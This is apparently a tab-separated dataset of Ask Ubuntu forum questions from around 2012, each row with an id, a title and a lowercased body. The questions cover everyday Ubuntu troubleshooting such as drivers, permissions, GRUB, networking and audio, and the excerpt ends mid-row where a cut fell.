225998	launcher icons fuzzy	i have had blurry icons in my launcher ever since i upgraded to ubuntu 12.10 . i have included a print screen . does anyone know what i can do to resolve this ?
225999	can not change permission for /var/www/	i recently installed ubuntu server and put the gui on so i can get the hang of linux . however , i ca n't seem to gain access to the /var/www/ folder so i can put and edit my html files ... i tried what was on this post : change folder permissions and ownership and i still ca n't move files . ( except if i use nautilus ) when i tried what ikke suggessted , it appeared to have worked ( as in no errors thrown in terminal ) but when i still ca n't move files into the folder . if i use nautilus and look at the permissions for /var/www it lists me as the owner ( is just says my username ) , create and delete files for folder access . and -- - for file access . if i change file access to read and write it just goes back to -- - once i hit apply permissions to enclosed files . what am i missing ?
226006	what is the best method to enable third party sources after an upgrade ?	i have recently upgraded my 12.04 lts ubuntu to 12.10 ubuntu . during the installation process third party resources were disabled . the dialogue suggested that `` some third party resources in your software.list were disabled.you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . please guide how to enable third party sources ? i do n't find any interface were i can control enabling or disabling of third party sources . please note that i have ubuntu software center and update manager installed . please also note that i had redshift installed on my computer since 12.04 but the same is not working in 12.10 .
226009	not able to add repo when apt is using a proxy connection	i have ubuntu 12.10 working on my system . i have tried many time to add repo but every time i tried i got the same error as in this case . $ sudo add-apt-repository ppa : scopes-packagers/ppa can not access ppa ( https : //launchpad.net/api/1.0/~scopes-packagers/+archive/ppa ) to get ppa information , please check your internet connection . my net is working fine . apt-get install is also working . so why is it giving error that check your internet connection ? ( i am working under proxy server with authentication ) $ cat /etc/apt/apt.conf file acquire : :http : :proxy `` http : //username : password @ 172.31.100.29:3128/ '' ; acquire : :https : :proxy `` https : //username : password @ 172.31.100.29:3128/ '' ; acquire : :ftp : :proxy `` ftp : //username : password @ 172.31.100.29:3128/ '' ; acquire : :socks : :proxy `` socks : //username : password @ 172.31.100.29:3128/ '' ;
226012	anyone know of a good frontend for a carpc thats ubuntu based ?	i have chased this for several days now.. i am working with an oem to build/market/sell all electric vehicle ( s ) . we are wanting to build a carpc for these vehicles ( similar to mimodhp.com ) . mimod uses windows , and i dont want to use windows for this project . i am thinking a linux os is the best for this type of `` embedded application '' . i have looked at various `` front ends '' for carpcs , like riderunner , centrafuse , but i came to the conclusion they are all slow , poorly implemented , poorly supported ( especially with ride runner ) , and they are all windows based . centrafuse has some sort of beta thing for linux , ( they show no real interest in linux ) , and thats about it . i found a couple videos on youtube talking about linuxice and nghost , which looked interesting . then i googled that , and found its a dead project , replaced by another project , meego . i googled that , and i see its also pretty much dead . i cant imagine a front end being that complicated to create . does anyone on this forum/site know of a good front end to ubuntu for a carpc ? its basically just a menu system with big buttons , that works with a touchscreen , and has things like an on screen keyboard ( much like my samsung phone does actually , which runs android ) . by the way i am not just looking for playing mp3s/videos , etc . we want to have gauges and show the state of the controller and the batteries , gps navigation , control things like power windows/locks , show turn signals , basically a digital replacement for all the analog instruments in a vehicle . kind of like this : http : //www.chevyhardcore.com/news/greg-cullums-69-chevelle-brings-muscle-into-the-world-of-tomorrow/
226013	how do you move the window controls to the window when maximized	i want to move my window controls ( close , maximize , minimize ) back to the current window while maximised . i removed global menu and indicator-appmenu already but the window controls still default to the panel ( and hidden at that ) when maximized . anyone got any ideas ?
226018	reference counting on exported dbus objects ?	i 'm working on a dbus service that needs to export objects on demand when requested by 3rd party applications . that part seems fairly strait-forward . but i also need to `` garbage collect '' these objects when it has zero consumers . i could have api that requires the 3rd party applications to explicitly release the objects , but the downside is if the consumer application crashes without releases the references , unused objects would accumulate . for what it 's worth , i 'm using dbus from python via python3-dbus . so i have 2 questions i guess : what sort of mechanisms does dbus provide for reference counting on exported objects , is there a way to know when zero processes are currently `` observing '' an object ? what is considered the best-practice for designing such a dbus api , and what do people think is a good example to follow ? ( the only thing like this i can think of is the avahi browser objects . ) my question will probably make more sense if i describe the exact problem : dmedia is a specialized distributed file-system aimed at media files . files are given a globally unique id based on their content-hash . when an application needs to use a file ( say for playback or display ) , it will use the dmedia dbus api to resolve the file id into a regular file path . for example , this id : 5pulsaf3pfr4vpnjmlsaj362hg475ndkkisdyxw7wujcfujn could for example resolve into the file : /media/mydrive/.dmedia/files/5p/ulsaf3pfr4vpnjmlsaj362hg475ndkkisdyxw7wujcfujn but things are more complicated than that . the file might not be available locally , in which case dmedia can download the file from one of the user 's other devices or from the cloud . so we need signals for say download progress , and to signal what that regular file path is once a file is downloaded . the resolution also might change over time when removable drives are connected or disconnected . a user might remove a drive , at which point the file is n't available locally and dmedia would try to download it . or the user might plug in an additional drive , and the resolution of a given file could change as dmedia re-load-balances across the drives . it seems that having a dbus object exported per current file-of-interest is a reasonable approach , but perhaps that 's making things too complicated . i suppose it 's the difference between needing more filtering and smarts on the consumer vs the service side . a flat collection of signals and methods on a single object would make things easier for the service , but put more burden on the consumer . if we export a dbus object per-file-of-interest , i 'm rather certain we need the garbage collection as a very large number of files can be of interest at some point during the dbus service lifecycle . i 'd much appreciate any advice on this !
226020	error mounting system-managed device /dev/sda5	how can i solve this problem ? error mounting system-managed device /dev/sda5 : command-line `mount `` /media/naymar/skool '' ' exited with non-zero exit status 1 : [ mntent ] : line 2 in /etc/fstab is bad mount : ca n't find /media/naymar/skool in /etc/fstab or /etc/mtab**
226024	possible careers	i am currently a college freshman and i am curious about what kind of careers i could possibly get working on ubuntu and what kind of requirements are there like education to get said jobs . my dream job would be to be a part of the ubuntu project so if you are willing to answer me it would be much appreciated .
226026	is there a auto-complete tag like control for quickly/pygtk ?	i am making a todo like application with indicator support using glade/python/pygtk/glade . i am making a form to save a todo item . each todo will belong to 0 or more projects . when a user enters a project name in a text input field i want it to auto-complete based on existing projects . this widget should behave similarly to the text input when completing the ask a question form on this site ( askubuntu.com ) . below is a screenshot of what i mean . for example when the user wants to add a todo under the projects `` quickly '' once the user starts typing `` qu* '' it should suggest all available projects that start with `` qu '' ( e.g . `` quick '' , `` quickly '' , `` queue '' , `` quack '' etc. ) . the user may press the down arrow to select the correct option or continue typing . when the user presses spacebar , it should start with a new suggestion . is there a control/widget in pygtk/quickly that i can use to accomplish this ? bonus points if i can also list a number next to each suggestion with the number of todo items that belong to this project , similar to the screenshot below .
226033	how can i preserve file modification times when copying to a nas ?	i recently installed a synology diskstation on my network . i mounted it from an ubuntu 12.04.1 computer with the browse network button in nautilus 3.4.2 . it shows up as afp : //randall @ diskstation.local/photo/ in nautilus . so far , so good . i then uploaded a lot of photos to it , all with modifications times covering several months . when i looked at the directory of photos on the diskstation , they all had modification times for the moment they were copied , not the modification times on the source computer . so much for sorting them by date on the diskstation . is there a way to re-copy the files but have their modification date be preserved ? perhaps i mounted the diskstation the wrong way . perhaps nautilus was the wrong tool to use . any suggestions ? btw , i have moved gigabytes of photos to a different nas ( plextor px-eh ) over smb/cifs from ubuntu 10.04 , 10.10 , 11.04 , and 11.10 with modification times fully preserved . the problem must be with the synology or some ubuntu 12.04 software .
226041	e : gpg error : http : //dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2	when i try to update i see this erroign http : //ppa.launchpad.net quantal inrelease ign http : *//archive.canonical.com lucid inrelease ign http : *//security.ubuntu.com quantal-security inrelease ign http : *//ir.archive.ubuntu.com quantal inrelease ign http : *//ppa.launchpad.net quantal inrelease hit http : *//archive.canonical.com lucid release.gpg hit http : *//security.ubuntu.com quantal-security release.gpg ign http : *//ir.archive.ubuntu.com quantal-updates inrelease get:1 http : *//dl.google.com stable inrelease [ 1,540 b ] hit http : *//ppa.launchpad.net quantal release.gpg hit http : *//archive.canonical.com lucid release hit http : *//security.ubuntu.com quantal-security release ign http : *//ir.archive.ubuntu.com quantal-backports inrelease ign http : *//ppa.launchpad.net quantal release.gpg hit http : *//archive.canonical.com lucid/partner sources hit http : *//security.ubuntu.com quantal-security/main amd64 packages hit http : *//ir.archive.ubuntu.com quantal release.gpg get:2 http : *//dl.google.com stable release.gpg [ 1,540 b ] ign https : *//private-ppa.launchpad.net quantal inrelease hit http : *//ppa.launchpad.net quantal release hit http : *//archive.canonical.com lucid/partner amd64 packages hit http : *//security.ubuntu.com quantal-security/restricted amd64 packages hit http : *//ir.archive.ubuntu.com quantal-updates release.gpg ign http : *//ppa.launchpad.net quantal release hit http : *//archive.canonical.com lucid/partner i386 packages hit http : *//security.ubuntu.com quantal-security/universe amd64 packages get:3 http : *//ir.archive.ubuntu.com quantal-backports release.gpg [ 933 b ] get:4 http : *//dl.google.com stable release [ 1,540 b ] ign http : *//dl.google.com stable release **e : gpg error : http : //dl.google.com stable release : the following signatures were invalid : nodata 1 nodata 2 r** thank you before your answer
226044	ca n't use java 7 from eclipse ?	i installed openjdk-6-jre from the package manager , then i installed eclipse , and this was the default jre . now i needed to install , in addition to 6 , also java 7 , so i installed openjdk-7-jre from the package manager . however , in eclipse i still see only jre 6 . also from the command line i see only java 6 : $ java -version java version `` 1.6.0_24 '' openjdk runtime environment ( icedtea6 1.11.5 ) ( 6b24-1.11.5-0ubuntu1~12.04.1 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) how can i use jre 7 from eclipse ?
226047	juju ssh fails because of permission denied ( public key )	when i try doing a juju ssh into one of the machines , it returns an error 2012-12-06 14:16:16,695 info connecting to environment ... 2012-12-06 14:16:25,671 info connected to environment . 2012-12-06 14:16:26,994 info connecting to unit sqldb/0 at ec2-54-251-4-139.ap-southeast-1.compute.amazonaws.com permission denied ( publickey ) . i can still ssh into nodes i created a while back ( 2 months ago ) . i 'm not sure what 's happening . it seems juju is not copying over my public key to the new nodes i 'm adding for some reason . is it some sort of configuration issue ?
226054	how do i join two images in ubuntu ?	i want to join two image files in ubuntu 12.04 . is there any way i can accomplish this ? is there any utility for joining image files , perhaps something like ms-paint in ubuntu ?
226058	adobe connect add in not installed error in both chrome and firefox in ubuntu 12.10	i participate in a virtual class which the basic software is adobe connect . i installed adobe by software center and then try to connect got this message . and i tried to remove it and installed the adobe flash player plugin by adobe website , also other websites was ok but i have same problem in connecting to my v class . when i was using ubuntu 12.04 i did n't have same problem . what 's your suggestion ?
226061	how to install the boot-repair tool in an ubuntu live disc ?	when the bootloader ( grub ) is broken , i can not access neither ubuntu nor windows . i heard that an easy solution to fix this is to use the boot-repair tool from an ubuntu livecd ( or liveusb ) . what are the steps to do this ?
226063	what are some typical uses of hard links ?	everyone who was used to windows can imagine what symlinks are and how they 're used . on the other hand , the hard link concept is foreign to windows ( am i correct ? ) . i would like to know what are the typical uses to hard links in linux . i 've already seen different posts describing the difference in how they work . what i 'm asking is what are some typical situations when a user would be better off using hard links instead of symlinks ?
226065	ubuntu 12.04 not locking encrypted hard drive on log out	i 'm running ubuntu 12.04 with gnome 3.4 . i have two external hard drives . i encrypted both using ubuntu 's disk utility . when i use nautilus to mount them , i 'm asked for my decryption password . regardless of whether i then click `` forget password immediately '' or `` remember password until you logout '' , though , i find that ubuntu does not lock the drives when i log out . rather , when i log back in , they 're still mounted . ( to be clear , restarting the computer does unmount them so that they require the password on the next log in . ) i 'm concerned that these drives are remaining unprotected when i log out without restarting my computer . i would be grateful for help understanding whether this is a bug . thank you !
226066	coda-like experience for ubuntu	i 'm a web developer who 's going to transition from using mac os x to ubuntu . i 've been using coda for some time , only because it makes web development easy . i know a full fledged app is n't available for linux , but would like to know about apps that specialize in the same tasks that coda offers . i plan on switching to vim for code editing , i 'm extremely proficient and will install the janus plugin and be good to go for editing code . one thing that makes editing on coda so amazing is its extremely good at sftp , you can drag and drop files and/or folders from your local drive to the server . also , you can edit code directly on the server . the problem here , is that using vim i do n't know of a way to edit code on a remote server , while using my own vim settings and plugins . to solve this , i would like to know of a good sftp client or a good sftp cli . a cli that could synchronize your files after a file has been modified would be perfect , but not necessary . now , one of the biggest and best features of coda is its ability to view your databases . you get to create a database , create tables , add stuff , delete stuff and view the contents of the table ( all this without writing a single sql statement ) . i will admit that databases are my weak point , but is a very important part of my job . if there is a tool that specializes in databases would be perfect . i would n't prefer to use the command line for database stuff , but if there is a cli for databases that i 'm missing could potentially be useful . so i guess i 'm asking for two things . a tool that makes databases easier to visualize and a tool that assists in pushing my local code to a server .
226067	how to run wayland/weston ?	ubuntu 12.10 ships weston and wayland . what are the basic steps i need to take to make them usable ? trying to start weston gives this and then drops back to the command prompt : $ weston date : 2012-12-06 cet [ 10:53:58.368 ] weston 0.95.0 http : //wayland.freedesktop.org/ bug reports to : https : //bugs.freedesktop.org/enter_bug.cgi ? product=weston build : [ 10:53:58.368 ] os : linux , 3.5.0-19-generic , # 30-ubuntu smp tue nov 13 17:49:53 utc 2012 , i686 could n't open /home/ingo/.config/weston.ini [ 10:53:58.368 ] loading module '/usr/lib/weston/x11-backend.so' [ 10:53:58.370 ] initializing x11 backend could n't open /home/ingo/.config/weston.ini libegl warning : unsupported platform windows libegl warning : dri2 : failed to authenticate libegl warning : dri2 : failed to open swrast ( search paths /usr/lib/fglrx/dri ) libegl warning : unsupported platform windows libgl error : failed to load driver : swrast libgl error : try again with libgl_debug=verbose for more details . [ 10:53:58.389 ] failed to choose config : 0 [ 10:53:58.389 ] failed to create compositor $ ps : i know that they are n't ready for prime-time yet , anything basic like opening a terminal or hello-world type thing in weston would be enough .
226069	bash does not remember programs with non 0 exit status in history	i enter a command . it fails . i press arrow up , modify something and enter it again ... hold it right there . it used to work like that . now it 's more like : i enter a command . it fails . i press arrow up , get the last command which did n't fail , likely `` ls '' or something useless and i type the whole thing again back by hand . what happened ? it was n't always like this . but it 's quite some time since this behavior changed , i 'll give you that . some years ago , at least . how do i put some sanity back into my bash prompt ?
226070	how to share the home folder with windows on a dual-boot system	i dual-boot ubuntu quantal and windows 7 and even though i rarely use windows , when i do , i want to be able to have access to my home folder . i tried setting the /home mount point on a separate ntfs partition while installing but it seems that that requires an ext file system . my current solution is to replace the documents , pictures , videos , music and downloads folders in /home/username with symlinks to their equivalents on the data partition . is there a better , smoother way of having access to home from both operating systems ?
226071	papyrus installation	i have some question about papyrus ; how can i install papyrus uml to my 64 bit system ( windows 7 , not ubuntu ! ) ? can you give the steps ? i have tried what is told in the papyrus uml website but i could not manage .
226074	resizing disk space	i 'm using wubi 12.04 . when i installed , the disk size was 18 gb . now i 'm almost running out space . but i have enough space in windows drive in which i installed wubi . i tried to increase the size of ubuntu from this link : https : //help.ubuntu.com/community/resizeandduplicatewubidisk but it gives the message : wubi-resize.sh : the new size ( 5 gb ) is n't sufficient to hold your wubi-resize.sh : existing install ( 18 gb ) plus a freespace buffer what should i do ?
226078	i need two gimps	i am using a vintage computer for my home use and to be frank i am satisfied with it since it is what i can afford now -- i use ubuntu derived peer linux os and have gimp 2.8 working good and meets my needs . but due to the vintage configuration that i have it takes a long time to load and work but i need it for my little works related with educational helps - in most of the times i do n't need my tweaked up gimp with all the plug ins and extra brushes i need a faster gimp so i want to have gimp 2.6 or even 2.4 in my system along with the current one . have pinta and like softwares but to meet my needs i definitely need gimp my question is can i have two different versions of gimp at the same time which i can load from the menu itself please help me thanking you all for allowing me breath the fresh air of open source --
226081	how to customize live ubuntu cd with my own branding ?	i would like to create a customized ubuntuos ( live cd/dvd ) for my office and house by installing some additional packages . i have followed this link but it does n't seems to work . can anyone provide clear instructions ? customize packages that i want to install : kde desktop enviornment thunderbird vlc player wine programme loader skype playmouth manager super boot manager synaptic package manager changes that i need : different default ubuntu wallpaper installing kde environment changing boot ( splash ) screen with my customize theme i want to installing ubuntu with 2 language , bangla & english please note , i do not prefer remastersys , manual way will be appreciated .
226084	free basic compiler error 23 : file not found , libsupc++.a	i am trying to compile a simple a hello word qbasic program in ubutu 12.04. downloaded and installed as instructed here . http : //www.freebasic.net/get print `` hello word '' i compiled it . fbc hello.bas but i got the following error . hello.bas ( ) error 23 : file not found , libsupc++.a ld : can not find -lncurses ld : can not find -lsupc++
226086	installing ati radeon proprietary drivers 9.3	ok . i 'm sorry for all of the edits , but upon further research i have decided to completely overhaul how i am asking my question and what i am asking . thank @ stephenmyall for making me see some sense , because if i had n't done this i never would have gotten an answer for this . ok , in any case , here goes : i have a radeon x1200 . @ stephenmyall linked to a guide on how to install current ati catalyst drivers , and 2xxx-4xxx legacy drivers in 12.10 . that did not work for me mainly because i need to install the legacy drivers 9.3 . it says on the ati website that 9.3 is only compatable with x.org 6.7-7.4 . so my question is this : how would i downgrade to x.org 7.4 , what would this effect , and would there be a better option that might get me better performance than the native drivers , like the proprietary 9.3 legacy drivers .
226087	how to switch to a generic kernel in a headless ubuntu server 12.04 ?	i just got a dedicated server with ubuntu 12.04 installed with a custom compiled kernel . since i would like to install virtualbox and this custom kernel does n't support dynamic module loading ( for security ) i need to change the kernel . i 'm running some ubuntu servers for years but never played with grub and a headless computer . when the command update-grub is run it shows the different kernel it finds . here is what i see generating grub.cfg ... found linux image : /boot/bzimage-3.2.13-xxxx-grs-ipv6-64 found linux image : /boot/vmlinuz-3.2.0-34-generic found initrd image : /boot/initrd.img-3.2.0-34-generic no volume groups found done the first one is the active one as seen with uname -r. to me it looks like the second kernel is the one i should use . but i do n't know how to configure grub2 to use it . the computer is also configured with a software raid using mdadm i guess . never used that before . i do n't know if playing with the grub of changing kernel could brake this . what must i do to set the generic kernel as the default one so that i can get virtualbox running .
226089	drawing tool in python	i am trying to implement drawing concept like line , rectangle , pencil and brush tool in gtk.textview . is it possible to draw into gtk.textview ? thanks in advance ...
226090	how do i output audio through hdmi ?	having a bit of an issue with getting audio to go through hdmi . here are the base specs : os : ubuntu desktop 12.04.1 x64 cpu : amd a10-5800k 3.8g 4m fm2 r mobo : msi fm2-a75ma-e35 os : ubuntu 12.04.1 lts vid card : ( integrated on cpu ) amd radeon hd 7660d hdmi sound works fine under win7 ( after mobo and vid drivers are installed ) , so it 's not physically broken . audio through the normal headphone jacks works fine under ubuntu . looking at the audio panel , there is no hdmi output at all . aplay -l also reports only : card 0 : generic [ hd-audio generic ] , device 0 : alc887-vd analog [ alc887-vd analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 in additional drivers there are two versions : ati/amd proprietary fglrx graphics driver ati/amd proprietary fglrx graphics driver ( post-release update ) the first installs , but problem persists . i do get more resolutions to pick from . second version does not , reporting it failed installation and to find details at : /var/log/jockey.log looked at the log , and it 's insanely long , if necessary i can get it to you guys . did more research and some had luck by manually installing the drivers , so tried to give that a shot by following this : https : //help.ubuntu.com/community/binarydriverhowto/ati # manually_installing_catalyst_12.6 starting at 3.1 manually installing catalyst 12.6 . i immediately had 2 issues , ( 1 ) the amd website does not provide any drivers for linux , and ( 2 ) the following command did not work : sudo sh amd-driver-installer-12-6-x86.x86_64.run -- buildpkg ubuntu/precise sh : 0 : ca n't open amd-driver-installer-12-6-x86.x86_64.run some other posts stated to update `` alsa-drivers '' , but that also did not work as install command for the new version of them did not work . i forget the exact issue , but similar to above , can not open / can not find . any help would be greatly appreciated !
226092	how to ask developers to think about high resolution screens	i just got a asus n56vz laptop , and it`s all good , but the screen resolution 1920x1080px . i am not asking , how to scale ui elements . if someone is interested i have found some tricks : increase font size in system settings increase unity dock size in myunity or system settings in modern ubuntu versions . tweak userchrome.js of firefox to make buttons|panels|icons larger add defaultzoomlevel extension to firefox to make it zoom pages initially . but all of it is miserable , because there are some big bugs : window decoration elements are way too small to pick them with mouse . i ca n't scale window easily and i ca n't position my cursor fast on the close|maximize buttons . tuning lines like in sound volume dialog are hardly clickable at all . unity top panel ( status panel & tray ) hardly can contain the bigger font , so it looks ugly , but icons are still the same . sometimes i can`t read text , as it is cropped ( and i cant scale some dialogs as it has fixed size ) chromium is not usable at all ( ok , it 's not ubuntu problem , but the problem still exists ) java applications are not scalable ( same as above ) in ff i am able to get descent results in most cases , but multiplication of system font increase and browser font increase makes system controls ( combobox , lists , drop down lists ) extremely big , so i cant even control the zoom level on the page . imho , we should post a bug report ( but what kind of bug ? ) and vote for it ! the problem is even deeper , but at least we should ask developers to think about it . so my question is : how can i post a report ( the right words and right place ) and how can we ( who already has that problem , or who want it to be solved before hardware upgrade ) vote for faster solution . any ideas ?
226100	ubuntu 12.10 - where are block devices of whole disk /dev/sda /dev/sdb	i have server in ovh with newest ubuntu 12.10 , but where are block devices of whole disk ? root @ ns : ~ # df -h filesystem size used avail use % mounted on rootfs 222g 2.4g 208g 2 % / /dev/root 222g 2.4g 208g 2 % / none 3.2g 252k 3.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 16g 0 16g 0 % /run/shm none 100m 0 100m 0 % /run/user /dev/md1 495m 25m 445m 6 % /boot root @ ns : ~ # fdisk /dev/sd sda1 sda2 sda3 sdb1 sdb2 sdb3 root @ ns : ~ # fdisk /dev/sda fdisk : unable to open /dev/sda : no such file or directory on the same server with ubuntu 12.04 i have normal /dev/sda and sdb device . best regards , konrad dudek
226102	how can i upgrade ubuntu 10.10 to 12.04 ?	currently i am working with ubuntu 10.10 , and i want to upgrade directly to ubuntu 12.04 without upgrading to intermediate versions of ubuntu ... is it possible ?
226103	setting up putty key	really hope you can help me here , i have a 12.04 server and a linux pc at home which i set up ssh keygen for with no problems , i want to now gain laptop entry to the server [ win7 ] using putty , i have made the private key and public one , copy and pasted the public one to a new file called authorized_keys2 and moved that file into .ssh/authorized_keys .. before i did that i sudo chmod 600 authorized_keys2 then put the key private key into pageant started putty put host name in etc , and its not working , i know or feel i missing permission here or something clearly not set right , anyone share any thoughts on this ? after 3 failed login , s i get locked out by fail2ban , which i happy with , its working . lol or at least i hope thats all thats wrong , at the minute i cant gain entry , will wait 10 mins before trying , been reading a lot on how to do this , but no one says it clearly for using a second key through putty . thanks people , look forward to your reply .
226108	is there an easy way to automatically patch ubuntu sources as they become available and upload to a ppa ?	i 'm looking for a tool to do the following : automatically detect updates to a set of source packages ( specifically gtk+2 and gtk+3 ) download the source package apply my own custom patches to the source commit the patch properly ( dpkg-source -- commit [ something-or-other ] ? ) if successful upload them to a ppa on launchpad ( which i can then point my system to in the usual way ) . can launchpad do all of that for me ? if not , is there a tool that will automatically do all of that from a cron job ? failing the above , i 'll knock something together myself , but what commands do i need to : detect and download the source package updates ? ( i 'd prefer something like ( bzr|git ) pull rather than having to apt-get source a brand new copy each time ) auto-commit the patch locally ( i 'd use the same commit description each time ) ? upload the sources non-interactively to a ppa ? i 've found a question ( what is the proper way to patch wine for a custom ppa ? ) , which is similar but the steps in the answer are still basically manual and interactive . a completely hands-off version of that plus automatic detection of source updates would help a lot .
226112	install/upgrade ubuntu from another system	i have a new laptop with latest ubuntu preinstalled on it , its 12.04 . i have another laptop with ubuntu 10.04 on it . what i lack is a fast internet connection . i want to upgrade my ubuntu 10 laptop to a ubuntu 12 version . how is this possible without using internet connection ? can i move/copy the installation from the new laptop to the older one ? is there a way so that the newer laptop can upgrade the older one using a usb disk or dvd/cd ?
226117	screenshot of active window	in former versions of xubuntu , i was able to take a screenshot using alt+printscreen . this does n't work anymore in 12.04 . have the key binding changed ?
226125	no wifi or lan on ubuntu 12.04 or 12.10 live cd/usb using toshiba qosmio x870	i recently had issues with secure boot and could n't boot the live cd/usb but after disabling secure boot , i was able to 'try ubuntu ' . my currently problem is that i ca n't access wifi or lan from either ubuntu 12.04 or 12.10 live cd/usb which i do from windows 8 . also , the wireless button is able to turn on and off the wireless led but does n't find available wifi . please , what should i do to get both wifi and lan working on ubuntu using toshiba qosmio x870 ? updated : here 's the output of lspci : ubuntu @ ubuntu : ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.4 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 5 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 1213 ( rev a1 ) 07:00.0 ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 10 ) 08:00.0 network controller : realtek semiconductor co. , ltd. device 8723 09:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 )
226129	how does one get to terminal mode in later versions of ubuntu ?	in earlier versions of ubuntu , i could install wireless cards using terminal and ndiswrapper . in later versions i do n't see an obvious way to get to the terminal mode .
226130	mobile internet modem still not being detected	i tried to implement the answer in micromax 3g mobile internet modem not being detected . here is the output of lsusb . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 010 : id 1c9e:9913 omega technology bus 001 device 004 : id 064e : d20c suyin corp . bus 002 device 004 : id 0489 : e03c foxconn / hon hai with this information , i followed the answer step-by-step , replacing 9605 in the answer by 9913. usb_modeswitch -c /etc/usb_modeswitch.d/1c9e\:9913 outputs looking for target devices ... found matching product id adding device found devices in target mode or class ( 1 ) looking for default devices ... found matching product id adding device found device in default mode , class or configuration ( 1 ) accessing device 004 on bus 001 ... getting the current device configuration ... ok , got current device configuration ( 1 ) using first interface : 0x00 using endpoints 0x01 ( out ) and 0x81 ( in ) inquiring device details ; driver will be detached ... looking for active driver ... ok , driver found ( `` usbserial_generic '' ) ok , driver `` usbserial_generic '' detached scsi inquiry data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - vendor string : model string : revision string : ppďż˝ -- -- -- -- -- -- -- -- -- -- -- -- - usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : icera product : usb modem serial no . : 0.0.1 -- -- -- -- -- -- -- -- -- -- -- -- - setting up communication with interface 0 using endpoint 0x01 for message sending ... trying to send message 1 to endpoint 0x01 ... ok , message successfully sent resetting response endpoint 0x81 resetting message endpoint 0x01 - > run lsusb to note any changes . bye . i still do not have my modem detected by ubuntu 12.04 . my laptop is an aspire 4752zg .
226131	how can i use dropbox as a simple backup ?	i 'd like to use my dropbox account to backup my `` documents '' folder , without running the risk of deleting something on dropbox and my files being deleted on my computer . is there any way to do this ?
226134	how to enter into recovery mode ?	my root password has been changed automatically i dont know why ! ! while trying to reset my root password i just followed the instructio0ns from this link how do i reset a lost password ( using recovery mode requires me to type the password ) ? . but i couldnt enter into recovery mode by pressing shif or esc key . how to enter into recovery mode and change my root password. ? ?
226136	how to simulate a usb plug ?	i have an app that implements some automations when an usb key is plugged . while developing , i have to test it in a specific environment ( derivative from debian squeeze ) . the app subscribe to hal events via dbus . the problem is : my desk is on the third floor while my test machines are in the basement . i would really like to have a way to simulate a usb plug . usbip does not work on ubuntu . i ca n't manage to use the g_mass_storage module on ubuntu ( i lack the dummy_hcd module ) and in debian . maybe it is possible to simulate a dbus call ? my work station is on ubuntu 12.04 .
226139	editing grub2 listing and background-image ?	im using ubuntu 12.10.is that possible to list only ubuntu loader and windows7 loader in grub2 ? with a image background or something theme that will not damage boot ? can you provide some tutorials . or something tool/application to edit grub easily with matching dynamic image input
226141	user access on all computers in the network with his settings loaded via server	i have ubuntu 12.04 installed on three computers . i also have a ubuntu server . what i want is , user should be able to log in to any of the three systems in the server when the user logs in . his settings and the folders related to his will be mounted automatically . i mean , getting user settings and the network drives mounted automatically depending on the users login . i had seen this on a mac systems but i am new to ubuntu and this group . sorry if this is a wrong place to ask this question
226142	i ca n't compile a c++ program with the g++ command	if i try compiling my c++ source file by the following command : g++ a.cpp it outputs : the program 'g++ ' can be found in the following packages : * g++ * pentium builder try : sudo apt-get intsall < < a > selected package > however , if i run the suggested command ( sudo apt-get install g++ ) , it shows that everything is already installed . so , basically , how do i compile a simple c++ program in ubuntu 12.04 ?
226144	jack showing `` active '' and i 'm getting no sound	when i am starting jack it is now showing `` active '' instead of `` started '' and i am getting no sound . i 'm hoping there is a easy fix to this as i am kinda new . it shows the following in the messages panel : 14:01:58.168 patchbay deactivated . 14:01:58.316 statistics reset . 14:01:58.493 alsa connection change . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 14:01:58.744 alsa connection graph change . 14:02:54.459 startup script ... 14:02:54.461 dreamstudio-stop-pulseaudio can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 14:02:54.940 startup script terminated successfully . 14:02:54.942 jack is starting ... 14:02:54.945 /usr/bin/jackd -t5000 -dalsa -dhw:0 -r48000 -p1024 -n2 -d -chw:1 14:02:54.966 jack was started with pid=2202 . no message buffer overruns no message buffer overruns no message buffer overruns jackdmp 1.9.9.5 copyright 2001-2005 paul davis and others . copyright 2004-2012 grame . jackdmp comes with absolutely no warranty this is free software , and you are welcome to redistribute it under certain conditions ; see the file copying for details jack server starting in realtime mode with priority 10 audio_reservation_init acquire audio card audio1 acquire audio card audio0 creating alsa driver ... hw:0|hw:1|1024|2|48000|0|0|nomon|swmeter|-|32bit using alsa driver hda-intel running on card 0 - hda intel at 0xfea38000 irq 41 configuring for 48000hz , period 